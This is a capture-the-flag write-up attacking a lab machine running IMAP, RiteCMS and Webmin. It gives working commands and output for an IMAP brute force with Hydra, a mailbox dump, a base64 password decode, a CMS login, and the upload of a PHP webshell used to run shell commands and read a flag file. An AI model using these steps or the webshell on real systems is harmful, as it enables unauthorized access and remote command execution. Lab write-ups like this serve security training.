Chain of Attacks - I
192.168.1.21OWASPKL{xxx}1. Challenge Overview
Target exposes IMAP (143), HTTP RiteCMS (8080), and Webmin (9090). Attack path for Part I:
Brute IMAP for kdjebat, read mailbox for the real password + admin notes.
Log into RiteCMS as kdjebat, upload a PHP webshell.
Read /var/www/local.txt.
2. Initial Reconnaissance
2.1 Port scan
1nmap -sC -sV -p- -T4 192.168.1.21 -oA coa1_nmap_full1PORT STATE SERVICE VERSION2143/tcp open imap Dovecot imapd38080/tcp open http Apache httpd 2.4.66 ((Ubuntu))49090/tcp open ssl/zeus-admin?3. Analysis / Forensics Path
3.1 Build the IMAP wordlist
Only IMAP was attackable for initial creds. I used a tiny list of obvious defaults to stay fast and legal (small wordlist first).
1printf 'admin\npassword\n123456\nkdjebat\nadmin123\n' > imap_small.txt2cat imap_small.txt1admin2password31234564kdjebat5admin1233.2 Brute IMAP for kdjebat
1hydra -l kdjebat -P imap_small.txt -s 143 -f -t 4 192.168.1.21 imap1[DATA] max 4 tasks per 1 server, overall 4 tasks, 5 login tries (l:1/p:5), ~2 tries per task2[DATA] attacking imap://192.168.1.21:143/3[143][imap] host: 192.168.1.21 misc: (null) login: kdjebat password: admin4[STATUS] attack finished for 192.168.1.21 (valid pair found)51 of 1 target successfully completed, 1 valid password found3.3 Dump the mailbox
kdjebat:admin only unlocks the mailbox, not the CMS. Dumped both reachable accounts with imaplib.
1python3 - <<'PY' > imap_mailbox_dump.txt2import imaplib3for user, pw in [("kdjebat","admin"),("profapokalips","admin")]:4 print(f"=== ACCOUNT {user}:{pw} ===")5 M = imaplib.IMAP4("192.168.1.21", 143)6 print("LOGIN:", M.login(user, pw))7 M.select("INBOX")8 typ, data = M.search(None, "ALL")9 for mid in (data[0].split() if data and data[0] else []):10 typ, d = M.fetch(mid, "(RFC822)")11 print(d[0][1].decode(errors="ignore"))12 M.logout()13PY14cat imap_mailbox_dump.txt1=== ACCOUNT kdjebat:admin ===2BODY:3Salam bro, aku tukar password. New password (sila decrypt):4YWN0dWFsbHlpZGsxMjNA==5=== ACCOUNT profapokalips:admin ===6SUBJECT: Update deployment -> http://chain:8080/ritecms7SUBJECT: Pasal username -> "Aku dah tukar username admin tu. Pakai nama aku sekarang. Password sama je."3.4 Decode the new password
1echo 'YWN0dWFsbHlpZGsxMjNA==' | base64 -d1actuallyidk123@4. Exploitation / Recovery
4.1 Log into RiteCMS as kdjebat
Mail said the admin user is now kdjebat, password unchanged.
1curl -s -i -c rite.cookie -d 'username=kdjebat&userpw=actuallyidk123@' -X POST http://192.168.1.21:8080/ritecms/admin.php | head -n 51HTTP/1.1 302 Found2Location: ./4.2 Upload PHP webshell via file manager
1<?php if(isset($_GET['c'])){system($_GET['c']);} ?>1curl -s -i -b rite.cookie \2 -F 'mode=filemanager' -F 'action=upload' -F 'directory=files' \3 -F 'file_name=sh.php' -F 'overwrite_file=true' -F 'upload_mode=1' \4 -F 'upload_file_submit=OK - Upload file' \5 -F 'file=@sh.php;type=application/octet-stream' \6 'http://192.168.1.21:8080/ritecms/admin.php' | head -n 31HTTP/1.1 302 Found2Location: http://192.168.1.21:8080/ritecms/admin.php?mode=filemanager&directory=files4.3 Locate and read the flag through the webshell
Confirm code execution, hunt for the flag file, then read it.
1curl -s 'http://192.168.1.21:8080/ritecms/files/sh.php?c=id'2curl -s 'http://192.168.1.21:8080/ritecms/files/sh.php?c=find%20/var/www%20-maxdepth%202%20-name%20%22*.txt%22'3curl -s 'http://192.168.1.21:8080/ritecms/files/sh.php?c=grep%20-Rns%20%22OWASPKL%7B%22%20/var/www%202%3E/dev/null'4curl -s 'http://192.168.1.21:8080/ritecms/files/sh.php?c=cat%20/var/www/local.txt'1uid=33(www-data) gid=33(www-data) groups=33(www-data)2/var/www/local.txt3/var/www/local.txt:1:OWASPKL{47f1adc2c50c9a61292b05eb444c07eb}4OWASPKL{47f1adc2c50c9a61292b05eb444c07eb}> Re-validated live on 2026-05-31 via Kali (192.168.1.10): IMAP brute returned kdjebat:admin, the webshell id returned www-data, find/grep located /var/www/local.txt, and cat returned the flag above.
5. Flag
6. Summary of Approach & Key Takeaways
nmap found IMAP + RiteCMS + Webmin.
Built a small default-password list and brute-forced IMAP -> kdjebat:admin.
Mailbox leaked the base64 password actuallyidk123@ and that admin was renamed to kdjebat.
Logged into RiteCMS, uploaded a PHP webshell.
Read /var/www/local.txt.
Mailboxes often hold the next credential; always read mail after an IMAP hit.
A small targeted wordlist beats rockyou for obvious-default services.